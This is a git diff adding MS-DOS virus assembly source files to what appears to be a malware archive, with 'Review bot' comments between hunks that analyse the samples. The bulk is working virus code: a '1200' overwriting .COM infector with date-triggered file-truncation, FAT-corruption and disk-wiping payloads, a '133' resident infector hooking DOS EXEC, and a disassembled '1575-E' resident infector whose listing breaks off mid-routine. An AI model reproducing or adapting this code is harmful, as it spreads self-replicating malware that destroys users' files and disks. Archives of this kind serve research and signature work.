+ db 0C7h,06 +mov_2 dw 00 + db 0D1h,0C8h ; second MOV 6 + db 0B8h +mov_ax dw 00 ; a nothing MOV AX, 3 + db 0E9h ; jump instruction 1 +virus_offset dw 0 ; virus offset 2 + dw ID ; ID marker 2 + ; total bytes = 22 + +sig db '[100%] By MnemoniX 1994',0 + +virus_end: + +VIRUS_SIZE equ offset virus_end - offset virus_begin + +read_buffer dw HEADER_SIZE dup (?) ; storage for orig header +encrypt_buffer dw VIRUS_SIZE dup (?) ; storage for encrypted virus + +heap_end: + +MEM_SIZE equ offset heap_end - offset start +DECRYPTOR_SIZE equ offset virus_code - offset virus_begin +ENCRYPTED_SIZE equ offset virus_end - offset virus_code + +code ends + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.1200.asm b/MSDOS/Virus.MSDOS.Unknown.1200.asm new file mode 100644 index 00000000..bca946d5 --- /dev/null 
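Review bot: This file is byte-identical to MSDOS/Virus.MSDOS.Unknown.100%-1.asm added earlier in the same commit — both `index` lines record the new blob as 8115778f — so the archive now holds the same source under two names with nothing recording why. If the second name is a deliberate alias for a sample that circulated under both filenames, a one-line note at the top of this copy should say so; otherwise one copy should be dropped before the pattern spreads (the diffstat also lists alameda.asm and alemeda.asm at 381 lines each, which may be the same situation, though their blob ids are not visible here). A header such as `; Duplicate of Virus.MSDOS.Unknown.100%-1.asm (identical content); kept under its original archive filename` would make the intent explicit to the next person who diffs the two.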
+++ b/MSDOS/Virus.MSDOS.Unknown.1200.asm 
@@ -0,0 +1,317 @@
+;hmm.,.,.,.,without a name.,.,.,.,
+;this file is much like the 606, only it
+;is much more harmful...it has a special suprise
+;for three diffrent dates....hehehehe.,.,,..,.,
+;i had planned to have it in with the other TR-
+;series, but this was much to large to add in with.,.,
+;enjoy!....
+; nUcLeii
+; [*v i a*]===[98]
+
+
+
+.model tiny
+.code
+
+seg_a segment byte public
+ ASSUME CS: SEG_A, DS: SEG_A, ES: SEG_A
+
+filename equ 30 ;find file name
+fileattr equ 21 ;find file attributes
+filedate equ 24 ;find file date
+filetime equ 22 ;fine file time
+
+org 100h
+
+main proc
+start:
+ call dirloc
+
+infect:
+ mov dx, 100h
+ mov bx, handle
+ mov cx, 1203
+ mov ah, 40h
+ int 21h
+ ret
+
+dirloc:
+ mov dx, offset dirdat ;offset to hold new dta
+ mov ah, 1ah ;set dta address
+ int 21h
+
+newdir:
+ mov ah,19h ;get drive code
+ int 21h
+ mov dl, al ;save drive code
+ inc dl ;add one to dl (functions differ)
+ mov ah, 47h ;get current directory
+ mov si, offset currentdir ;buffer to save directory in
+ int 21h
+ mov dx, offset daroot ;move dx to change to root
+ mov ah, 3bh ;change directory to root
+ int 21h
+
+find:
+ mov cx, 13h ;include hidden/ro dir.
+ mov dx, offset wild ;look for '*'
+ mov ah, 4eh ;find file
+ int 21h
+ cmp ax, 12h ;no file?
+ jne findmore ;no dir? screw it then.
+
+wank1:
+ jmp rollout
+
+findmore:
+ mov ah, 4fh ;find next target
+ int 21h
+ cmp ax, 12h
+ je wank ;no more? crew it then.
+
+keepgoin:
+ mov dx, offset dirdat+filename ;point dx to fcb-filename
+ mov ah, 3bh ;change directory
+ int 21h
+ mov ah, 2fh ;get current dta address
+ int 21h
+ mov [diskdat], es ;save old segment
+ mov [diskdatofs], bx ;save old offset
+ mov dx, offset filedat ;offset to hold new dta
+ mov ah, 1ah ;set dta address
+ int 21h
+
+checkit:
+ mov cx, 07h ;find any attribute
+ mov dx, offset filetype ;point dx to exe files
+ mov ah, 4eh ;find first file function
+ int 21h
+ cmp ax, 12h ;was it found?
+ jne change
+
+nextfile:
+ mov ah, 4fh ;find next file
+ int 21h
+ cmp ax,12h ;none found
+ jne change ;see what we can do...
+ mov dx, offset daroot ;dx to change to root directory
+ mov ah, 3bh
+ int 21h
+ mov ah, 1ah ;set dta address
+ mov ds, [diskdat] ;restore old segment
+ mov dx, [diskdatofs] ;restore old offset
+ int 21h
+ jmp findmore
+wank:
+ jmp rollout
+
+change:
+ mov ah, 2fh ;temp. store dta
+ int 21h
+ mov [tempseg], es ;save old segment
+ mov [tempofs], bx ;save old offset
+ mov dx, offset filedat+filename
+ mov bx, offset filedat ;save file...
+ mov ax, [bx]+filedate ;tha date
+ mov orig_date, ax
+ mov ax, [bx]+filetime ;tha time
+ mov orig_time, ax
+ mov ax, [bx]+fileattr ;tha attributes
+ mov ax, 4300h
+ int 21h
+ mov orig_attr, cx
+ mov ax, 4301h ;change attributes
+ xor cx, cx ;clear attributes
+ int 21h
+ mov ax, 3d00h ;open file and read
+ int 21h
+ jc fixup ;error?..go get another!
+ mov handle, ax ;save handle
+ mov ah, 3fh ;read from file
+ mov bx, handle ;move handle to bx
+ mov cx, 02h ;read 2 bytes
+ mov dx, offset idbuffer ;save to buffer
+ int 21h
+ mov ah, 3eh ;close it for now
+ mov bx, handle ;load bx with handle
+ int 21h
+ mov bx, idbuffer ;give bx the id string
+ cmp bx, 02ebh ;are we infected?
+ jne doit ;hmm...go get another.
+
+fixup:
+ mov ah, 1ah ;set dta address
+ mov ds, [tempseg] ;restore old segment
+ mov dx, [tempofs] ;restore old offset
+ int 21h
+ jmp nextfile
+
+doit:
+ mov dx, offset filedat+filename
+ mov ax, 3d02h ;open victim read/write access
+ int 21h
+ mov handle, ax ;save handle
+ call infect ;do your job...
+ ;mov ax, 3eh
+ ;int 21h
+
+rollout:
+ mov ax, 5701h ;restore original...
+ mov bx, handle ;handle
+ mov cx, orig_time ;time
+ mov dx, orig_date ;date
+ int 21h
+ mov ax, 4301h ;and attributes
+ mov cx, orig_attr
+ mov dx, offset filedat+filename
+ int 21h
+ ;mov bx, handle
+ ;mov ax, 3eh ;close em"
+ ;int 21h
+ mov ah, 3bh ;try this for speed...
+ mov dx, offset daroot
+ int 21h
+ mov ah, 3bh ;change directory
+ mov dx, offset currentdir ;back to the original
+ int 21h
+ mov ah, 2ah ;check system date
+ int 21h
+ cmp cx, 1998 ;hehe..if not then your already
+ jb getout ;screwed an ill leave ya alone.
+ cmp dl, 15 ;is it the 15th?...muhahaha
+ jne goaway ;not?...lucky you.
+ cmp dl, 19 ;is it the 19th?...muhahaha
+ je alter_fat ;your gonna have a few crosslinks...
+ cmp dl, 29 ;is it the 29th?...muhahaha
+ je ouch ;your screwed,..,.,.,.,
+ mov dx, offset dirdat ;offset to hold new dta
+ mov ah, 1ah ;set dta address
+ int 21h
+ mov ah, 4eh ;find first file
+ mov cx, 7h
+ mov dx, offset allfiles ;offset *.* ...hehehe...
+ jmp rockem
+
+getout:
+ call outta
+
+goaway:
+ call outta
+
+rockem:
+ int 21h
+ jc goaway ;error? screw it then...
+ mov ax, 4301h ;find all "normal" files
+ xor cx, cx
+ int 21h
+ mov dx, offset dirdat+filename
+ mov ah, 3ch ;write to all files in current dir.
+ int 21h
+ jc outta ;error? screw it then...
+ mov ah, 4fh ;find next file
+ jmp rockem
+
+ouch:
+ xor dx, dx ;clear dx
+
+rip_hd1:
+ mov cx, 1 ;track 0, sector 1
+ mov ax, 311h ;17 secs per track (hopefully!)
+ mov dl, 80h
+ mov bx, 5000h
+ mov es, bx
+ int 13h ;kill 17 sectors
+ jae rip_hd2
+ xor ah, ah
+ int 13h ;reset disks if needed
+rip_hd2:
+ inc dh ;increment head number
+ cmp dh, 4 ;if head number is below 4 then
+ jb rip_hd1 ;go kill another 17 sectors
+ inc ch ;increase track number and
+ jmp ouch ;do it again
+
+alter_fat:
+ push dx
+ push bx
+ push cx
+ push ax
+ push bp ;save regs that will be changed
+ mov ax, 0dh
+ int 21h ;reset disk
+ mov ah, 19h
+ int 21h ;get default disk
+ xor dx, dx
+ call load_sec ;read in the boot record
+ mov bp, bx
+ mov bx, word ptr es:[bp+16h] ;find sectors per fat
+ push ax ;save drive number
+ call rnd_num ;get random number
+ cmp bx, ax ;if random number is lower than
+ jbe alter_fat1 ;secs per fat then jump and kill 'em
+ mov ax, bx ;else pick final sector of fat
+alter_fat1:
+
+ int 26h ;write same data in that fat
+ pop bp
+ pop ax
+ pop cx
+ pop bx
+ pop dx
+ jmp outta
+
+rnd_num:
+ push cx
+ push dx ;save regs that will be changed
+ xor ax, ax
+ int 1ah ;get system time
+ xchg dx, ax ;put lower word into ax
+ pop dx
+ pop cx
+ ret ;restore values and return
+
+load_sec:
+ push cx
+ push ds ;save regs that will be changed
+ push ax ;save drive number
+ push cs
+ pop ds
+ push cs
+ pop es ;make es and ds the same as cs
+ mov ax, 0dh
+ int 21h ;reset disk
+ pop ax ;restore drive number
+ mov cx, 1
+ mov bx, offset sec_buf
+ int 25h ;read sector into buffer
+ pop ds
+ pop cx
+ ret ;restore regs and return
+
+outta:
+ mov ax, 4c00h ;end program
+ int 21h
+
+words_ db "nUcLeii~ *v. i. a*",0
+words2 db "1200..n0name",0
+allfiles db "*.*",0
+currentdir db 64 dup (?)
+daroot db "\",0
+dirdat db 43 dup (?)
+diskdat dw ?
+diskdatofs dw ?
+filedat db 43 dup (?)
+filetype db "*.com",0
+handle dw ?
+idbuffer dw ?
+orig_attr dw ?
+orig_date dw ?
+orig_time dw ?
+sec_buf dw 100h dup(?)
+tempofs dw ?
+tempseg dw ?
+wild db "*",0
+
+main endp
+seg_a ends
+end start
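Review bot: The header promises payloads on three dates, but the trigger chain visible in `rollout` makes two of them unreachable: `cmp dl, 15` / `jne goaway` exits for any day other than the 15th before `cmp dl, 19` and `cmp dl, 29` are ever evaluated, so `alter_fat` (INT 26h write over a FAT sector) and `ouch` (INT 13h sector wipe of the first hard disk) are dead code, and the only live payload is the `rockem` loop, which on the 15th of any month from 1998 on truncates with AH=3Ch every `*.*` match in the directory the program was started from (the `mov ax, 4301h` before it is issued against the literal `*.*` pattern, and no 3Ch handle is ever closed, so the loop presumably stops once the handle table fills). The infection path should also be described for what it is: `infect` writes 1203 bytes from offset 100h at position 0 of a .COM opened with 3D02h, i.e. it overwrites the host rather than appending, and the `cmp bx, 02ebh` reinfection test looks for an `EB 02` prefix this code never produces (its own first instruction at 100h is `call dirloc`, opcode E8), so files already hit are hit again; since `doit` falls straight into `rollout` it also appears to infect at most one file per run. I'd replace the nine opening comment lines with a factual header, e.g. `; Overwriting .COM infector (host not preserved). Walks the root entries of the current drive, overwrites the first uninfected *.com it finds in one it can chdir into, then on the 15th (year >= 1998) truncates every file in the launch directory; the 19th/29th FAT and disk-wipe branches are unreachable.` so the archive entry states what the sample actually does.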
diff --git a/MSDOS/Virus.MSDOS.Unknown.133.asm b/MSDOS/Virus.MSDOS.Unknown.133.asm
new file mode 100644
index 00000000..13bfc613
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.133.asm
@@ -0,0 +1,99 @@ +VSize=085h + +Code Segment + Assume CS:Code + org 0 + db 4Dh + jmp Start + + Org 600h + +Bytes db 0CDh,20h,90h,90h + +Start: mov si, 0100h + mov bx, offset Int21 + mov cx, 0050h + mov di, si + add si, [si+2] + push di + movsw + movsw + mov es, cx + cmpsb + je StartFile + dec si + dec di + rep movsw + mov es, cx + xchg ax, bx + xchg ax, cx +Loop0: xchg ax, cx + xchg ax, word ptr es:[di-120h] + stosw + jcxz Loop0 + xchg ax, bx +StartFile: + push ds + pop es + ret + +Int21: cmp ax, 4B00h + jne End21 +Exec: push ax + push bx + push dx + push ds + push es + mov ax, 3D02h + call DoInt21 + jc EndExec + cbw ;Zero AH + cwd ;Zero DX + mov bx, si ;Move handle to BX + mov ds, ax ;Set DS and ES to 60h, + mov es, ax ;the virus data segment + mov ah, 3Fh ;Read first 4 bytes + int 69h + mov al, 4Dh + scasb ;Check for 4D5Ah or infected file mark + je Close ;.EXE or already infected + mov al, 2 + call LSeek ;Seek to the end, SI now contains file size + mov cl, VSize ;Virus size in CX, prepare to write + int 69h ;AH is 40h, i.e. Write operation + mov ax, 0E94Dh ;Virus header in AX + stosw ;Store it + xchg ax, si ;Move file size in AX + stosw ;Complete JMP instruction + xchg ax, dx ;Zero AX + call LSeek ;Seek to the beginning + int 69h ;AH is 40h, write the virus header +Close: mov ah,3Eh ;Close the file + int 69h +EndExec: pop es + pop ds + pop dx + pop bx + pop ax +End21: jmp dword ptr cs:[69h * 4] + +LSeek: mov ah, 42h ;Seek operation + cwd ;Zero DX +DoInt21: xor cx, cx ;External entry for Open, zero cx + int 69h + mov cl, 4 ;4 bytes will be read/written + xchg ax, si ;Store AX in SI + mov ax, 4060h ;Prepare AH for Write + xor di, di ;Zero DI + ret + +VLen = $ - offset Bytes + +Code EndS +End + +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + diff --git a/MSDOS/Virus.MSDOS.Unknown.1575-e.asm b/MSDOS/Virus.MSDOS.Unknown.1575-e.asm new file mode 100644 index 00000000..76d3a1fc --- /dev/null 
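Review bot: The listing carries no header describing the sample, so everything an analyst needs has to be recovered from the bare code; the only metadata is `VSize=085h`, `VLen = $ - offset Bytes` and the trailer greeting. A comment block above `Start:` stating that `Int21` filters on `cmp ax, 4B00h` (the EXEC path), that the original vector is chained through IVT slot 69h (`End21: jmp dword ptr cs:[69h * 4]`, with the DOS calls inside `Exec` issued as `int 69h`), and that the byte `4Dh` written by `mov ax, 0E94Dh / stosw` is the marker re-tested by `scasb` in `Exec` would give triage and signature work the facts in one place. A non-default interrupt 69h vector and a leading `4Dh`+`jmp` in a .COM file are the observable artifacts of this sample and are worth stating explicitly rather than leaving to be inferred from the hunk.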
+++ b/MSDOS/Virus.MSDOS.Unknown.1575-e.asm 
@@ -0,0 +1,983 @@ + +PAGE 59,132 + +; +; +; 1575-E +; +; Created: 23-May-92 +; Passes: 5 Analysis Options on: none +; +; + +data_1e equ 6 +data_2e equ 84h +data_3e equ 86h +data_4e equ 100h +data_10e equ 31Fh +data_12e equ 0 ;* +data_13e equ 3 ;* +data_14e equ 12h ;* +data_15e equ 0 +data_55e equ 0FA0h +data_56e equ 6B0h +data_57e equ 725h + +seg_a segment byte public + assume cs:seg_a, ds:seg_a + + + org 100h + +1575-e proc far + +start: + jmp short loc_4 + db 90h +data_17 dw 0B2Bh, 103Eh +data_19 dw 0FF53h +data_20 dw 0F000h +data_21 db 0B4h + db 2 +data_22 dw 2AB2h +data_23 dw 21CDh + db 0CDh, 20h +data_24 dw 0E5h + db 3Dh, 02h,0FFh,0FFh +data_25 dw 50Fh +data_26 dw 100h + db 26h,0D9h +data_27 dw 100h +data_28 dw 50Fh +data_29 dw 480h +data_30 dw 0 +data_31 dw 0 +data_32 dw 53F0h +data_33 dw 5 +data_34 dw 648Ch +data_35 dw 789Fh +data_36 dw 480h +data_37 dw 0BD1h +data_38 dw 1213h +data_39 dw 0EA2h +data_40 dw 5BFh +data_41 db 4Dh +data_42 db 31h + db 68h, 7Dh, 02h,0FBh, 07h + db 70h, 00h + +loc_ret_2: + retn + db 0E2h, 00h + db 0F0h,0FBh, 07h, 70h, 00h +loc_4: + push es + push ds + mov ax,es + push cs + pop ds + push cs + pop es + mov data_38,ax + mov ax,ss + mov data_33,ax + std ; Set direction flag + mov ax,7076h + cld ; Clear direction + xor ax,ax ; Zero register + mov ds,ax + xor si,si ; Zero register + mov di,offset data_42 + mov cx,10h + repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] + push ds + pop ss + mov bp,8 + xchg bp,sp + call sub_2 + jmp loc_27 +loc_5: + call sub_13 + call sub_3 + jz loc_6 ; Jump if zero + mov al,data_53 + push ax + call sub_4 + pop ax + mov data_53,al + jmp short loc_7 + db 90h +loc_6: + call sub_6 + call sub_7 + cmp byte ptr data_53,0 + jne loc_7 ; Jump if not equal + mov ax,4C00h + int 21h ; DOS Services ah=function 4Ch + ; terminate with al=return code +loc_7: + cmp byte ptr data_53,43h ; 'C' + jne loc_10 ; Jump if not equal +loc_8: + pop ds + pop es + push cs + pop ds + pop es + push es + mov di,data_4e + mov si,offset 
data_21 + mov cx,0Ch + repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] + push es + pop ds + mov ax,100h + push ax + xor ax,ax ; Zero register + retf ; Return far + +1575-e endp + +; +; SUBROUTINE +; + +sub_2 proc near + mov si,data_1e + lodsw ; String [si] to ax + cmp ax,192h + je loc_8 ; Jump if equal + cmp ax,179h + jne loc_9 ; Jump if not equal + jmp loc_12 +loc_9: + cmp ax,1DCh + je loc_10 ; Jump if equal + retn +loc_10: + pop ds + pop es + mov bx,cs:data_25 + sub bx,cs:data_36 + mov ax,cs + sub ax,bx + mov ss,ax + mov bp,cs:data_37 + xchg bp,sp + mov bx,cs:data_28 + sub bx,cs:data_29 + mov ax,cs + sub ax,bx + push ax + mov ax,cs:data_30 + push ax + retf ; Return far +data_43 db 23h + db 1Ah + db '<#/--!.$' + db 0Eh, 23h, 2Fh, 2Dh,0E0h +data_44 db 'A:MIO.COM', 0 + db 58h, 45h, 00h, 00h, 00h + db 24h, 24h, 24h, 24h, 24h + +; External Entry into Subroutine + +sub_3: + mov ax,3D02h + mov dx,offset data_44 ; ('A:MIO.COM') + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_11 ; Jump if carry=0 + clc ; Clear carry flag + retn +loc_11: + mov data_33,ax + mov dx,offset int_24h_entry + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + mov ax,4202h + mov bx,data_33 + mov cx,0FFFFh + mov dx,0FFFEh + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov dx,offset data_45 + mov ah,3Fh ; '?' 
+ mov bx,data_33 + mov cx,2 + int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + push ds + mov dx,data_40 + mov ax,data_39 + mov ds,ax + mov ax,2524h + int 21h ; DOS Services ah=function 25h + ; set intrpt vector al to ds:dx + pop ds + cmp data_45,0A0Ch + clc ; Clear carry flag + retn +data_45 dw 20CDh +loc_12: + cmp ax,22Dh + je loc_13 ; Jump if equal + push ds + pop es + push cs + pop ds + mov ax,data_33 + mov ss,ax + xchg bp,sp + mov si,offset data_42 + mov di,data_15e + mov cx,10h + cld ; Clear direction + repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] + jmp loc_5 +sub_2 endp + + +; +; SUBROUTINE +; + +sub_4 proc near +loc_13: + mov al,43h ; 'C' + mov data_53,al + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + mov data_41,al + mov dx,offset data_44 ; ('A:MIO.COM') + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_14 ; Jump if carry=0 + retn +loc_14: + mov data_33,ax + mov dx,offset data_21 + mov bx,data_33 + mov cx,0Ch + mov ah,3Fh ; '?' 
+ int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + push ax + add ax,10h + and ax,0FFF0h + push ax + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + shr ax,1 ; Shift w/zeros fill + mov di,data_10e + stosw ; Store ax to es:[di] + pop ax + pop bx + sub ax,bx + mov cx,627h + add cx,ax + mov dx,100h + sub dx,ax + mov bx,data_33 + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov ah,40h ; '@' + mov bx,data_33 + mov cx,0Ch + mov dx,offset data_46 + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ah,3Eh ; '>' + mov bx,data_33 + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + retn +sub_4 endp + +data_46 db 0Eh + db 8Ch,0C8h, 05h, 01h, 00h, 50h + db 0B8h, 00h, 01h, 50h,0CBh + +; +; SUBROUTINE +; + +sub_5 proc near + mov al,45h ; 'E' + mov data_53,al + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + mov data_41,al + mov dx,offset data_44 ; ('A:MIO.COM') + mov ax,3D02h + int 21h ; DOS Services ah=function 3Dh + ; open file, al=mode,name@ds:dx + jnc loc_15 ; Jump if carry=0 + retn +loc_15: + mov data_33,ax + mov dx,offset data_21 + mov bx,data_33 + mov cx,18h + mov ah,3Fh ; '?' 
+ int 21h ; DOS Services ah=function 3Fh + ; read file, bx=file handle + ; cx=bytes to ds:dx buffer + mov ax,4202h + mov cx,0 + mov dx,0 + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + push ax + add ax,10h + adc dx,0 + and ax,0FFF0h + mov data_31,dx + mov data_32,ax + mov cx,727h + sub cx,100h + add ax,cx + adc dx,0 + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + inc ax + mov data_23,ax + mov data_22,dx + mov ax,data_28 + mov data_29,ax + mov ax,data_27 + mov data_30,ax + mov ax,data_25 + mov data_36,ax + mov ax,data_26 + mov data_37,ax + mov dx,data_31 + mov ax,data_32 + mov cx,10h + div cx ; ax,dx rem=dx:ax/reg + sub ax,10h + sub ax,data_24 + mov data_28,ax + mov data_25,ax + mov data_27,100h + mov data_26,100h + mov ax,4200h + xor cx,cx ; Zero register + mov dx,2 + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov dx,offset data_22 + mov bx,data_33 + mov cx,16h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + int 21h ; DOS Services ah=function 42h + ; move file ptr, bx=file handle + ; al=method, cx,dx=offset + mov dx,100h + mov ax,data_32 + pop cx + sub ax,cx + sub dx,ax + mov cx,727h + add cx,ax + sub cx,100h + mov ah,40h ; '@' + int 21h ; DOS Services ah=function 40h + ; write file bx=file handle + ; cx=bytes from ds:dx buffer + mov ah,3Eh ; '>' + int 21h ; DOS Services ah=function 3Eh + ; close file, bx=file handle + retn +sub_5 endp + + push cx + mov cx,0 + mov ah,4Eh ; 'N' + int 21h ; DOS Services ah=function 4Eh + ; find 1st filenam match @ds:dx + pop cx + retn + +; +; SUBROUTINE +; + +sub_6 proc near + push es + mov ax,351Ch + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov cs:data_19,bx + mov cs:data_20,es + mov ax,3521h + int 21h ; DOS Services ah=function 35h + ; get 
intrpt vector al in es:bx + push es + pop ax + mov word ptr cs:data_17+2,ax + mov cs:data_17,bx + pop es + retn +sub_6 endp + + +; +; SUBROUTINE +; + +sub_7 proc near + push ax + push es + push ds + xor ax,ax ; Zero register + mov es,ax + mov si,data_3e + mov ax,es:[si] + mov ds,ax + mov si,data_57e + cmp word ptr [si],0A0Ch + jne loc_16 ; Jump if not equal + push ds + pop ax + call sub_14 + pop ds + pop es + pop ax + retn +loc_16: + push cs + pop ds + mov ax,data_38 + dec ax + mov es,ax + cmp byte ptr es:data_12e,5Ah ; 'Z' + nop ;*ASM fixup - sign extn byte + je loc_17 ; Jump if equal + jmp short loc_18 + db 90h +loc_17: + mov ax,es:data_13e + mov cx,737h + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + shr cx,1 ; Shift w/zeros fill + sub ax,cx + jc loc_18 ; Jump if carry Set + mov es:data_13e,ax + sub es:data_14e,cx + push cs + pop ds + mov ax,es:data_14e + push ax + pop es + mov si,100h + push si + pop di + mov cx,627h + cld ; Clear direction + repne movsb ; Rep zf=0+cx >0 Mov [si] to es:[di] + push es + sub ax,ax + mov es,ax + mov si,data_2e + mov dx,4A8h + mov es:[si],dx + inc si + inc si + pop ax + mov es:[si],ax +loc_18: + pop ds + pop es + pop ax + retn +sub_7 endp + + cmp al,57h ; 'W' + jne loc_19 ; Jump if not equal + jmp short loc_22 + db 90h +loc_19: + cmp ah,1Ah + jne loc_20 ; Jump if not equal + call sub_12 + jmp short loc_22 + db 90h +loc_20: + cmp ah,11h + jne loc_21 ; Jump if not equal + call sub_8 + iret ; Interrupt return +loc_21: + cmp ah,12h + jne loc_22 ; Jump if not equal + call sub_11 + iret ; Interrupt return +loc_22: + jmp dword ptr cs:data_17 + +; +; SUBROUTINE +; + +sub_8 proc near + mov al,57h ; 'W' + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + push cs + pop ds + push cs + pop es + mov byte ptr cs:data_47,0 + nop + call sub_9 + jnz loc_23 ; Jump if not zero + call sub_3 
+ jz loc_23 ; Jump if zero + call sub_16 + dec data_47 +loc_23: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +sub_8 endp + + +; +; SUBROUTINE +; + +sub_9 proc near + push cs + pop es + push cs + pop es + cld ; Clear direction + call sub_10 + jnc loc_24 ; Jump if carry=0 + cmp di,0 + retn +loc_24: + mov di,offset data_44 ; ('A:MIO.COM') + mov al,2Eh ; '.' + mov cx,0Bh + repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al + cmp word ptr [di],4F43h + jne loc_25 ; Jump if not equal + cmp byte ptr [di+2],4Dh ; 'M' + jne loc_25 ; Jump if not equal + mov byte ptr data_53,43h ; 'C' + nop + retn +loc_25: + cmp word ptr [di],5845h + jne loc_ret_26 ; Jump if not equal + cmp byte ptr [di+2],45h ; 'E' + jne loc_ret_26 ; Jump if not equal + mov byte ptr data_53,45h ; 'E' + nop + +loc_ret_26: + retn +sub_9 endp + + +; +; SUBROUTINE +; + +sub_10 proc near +loc_27: + push ds + mov si,cs:data_34 + mov ax,cs:data_35 + mov ds,ax + mov di,offset data_44 ; ('A:MIO.COM') + lodsb ; String [si] to al + cmp al,0FFh + jne loc_28 ; Jump if not equal + add si,6 + lodsb ; String [si] to al + jmp short loc_29 + db 90h +loc_28: + cmp al,5 + jb loc_29 ; Jump if below + pop ds + stc ; Set carry flag + retn +loc_29: + mov cx,0Bh + cmp al,0 + je locloop_30 ; Jump if equal + add al,40h ; '@' + stosb ; Store al to es:[di] + mov al,3Ah ; ':' + stosb ; Store al to es:[di] + +locloop_30: + lodsb ; String [si] to al + cmp al,20h ; ' ' + je loc_31 ; Jump if equal + stosb ; Store al to es:[di] + jmp short loc_32 + db 90h +loc_31: + cmp byte ptr es:[di-1],2Eh ; '.' + je loc_32 ; Jump if equal + mov al,2Eh ; '.' 
+ stosb ; Store al to es:[di] +loc_32: + loop locloop_30 ; Loop if cx > 0 + + mov al,0 + stosb ; Store al to es:[di] + pop ds + clc ; Clear carry flag + retn +sub_10 endp + + +; +; SUBROUTINE +; + +sub_11 proc near + mov al,57h ; 'W' + int 21h ; DOS Services ah=function 00h + ; terminate, cs=progm seg prefx + push ax + push cx + push dx + push bx + push bp + push si + push di + push ds + push es + push cs + pop ds + push cs + pop es + cmp byte ptr cs:data_47,0 + je loc_33 ; Jump if equal + jmp short loc_34 + db 90h +loc_33: + call sub_9 + jnz loc_34 ; Jump if not zero + call sub_3 + jz loc_34 ; Jump if zero + call sub_16 + dec data_47 + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +loc_34: + pop es + pop ds + pop di + pop si + pop bp + pop bx + pop dx + pop cx + pop ax + retn +sub_11 endp + +data_47 db 0 + +; +; SUBROUTINE +; + +sub_12 proc near + push ax + push ds + pop ax + mov cs:data_35,ax + mov cs:data_34,dx + pop ax + retn +sub_12 endp + + +; +; SUBROUTINE +; + +sub_13 proc near + push cs + mov al,0 + out 20h,al ; port 20h, 8259-1 int command + mov ax,3524h + int 21h ; DOS Services ah=function 35h + ; get intrpt vector al in es:bx + mov data_40,bx + mov bx,es + mov data_39,bx + pop es + mov si,offset data_43 + mov di,offset data_44 ; ('A:MIO.COM') + mov cx,0Fh + +locloop_35: + lodsb ; String [si] to al + add al,20h ; ' ' + stosb ; Store al to es:[di] + loop locloop_35 ; Loop if cx > 0 + + retn +sub_13 endp + + +; +; SUBROUTINE +; + +sub_14 proc near + push ax + push cs + pop ds + push cs + pop es + mov bl,data_41 + cmp bl,0Ch + ja loc_37 ; Jump if above + cmp bl,0 + je loc_37 ; Jump if equal + mov al,8 + out 70h,al ; port 70h, RTC addr/enabl NMI + ; al = 8, month register + in al,71h ; port 71h, RTC clock/RAM data + cmp al,0Ch + ja loc_37 ; Jump if above + cmp al,0 + je loc_37 ; Jump if equal + cmp al,bl + je loc_37 ; Jump if equal + inc bl + call sub_15 + cmp al,bl + je loc_37 ; Jump if equal + inc bl + call sub_15 + 
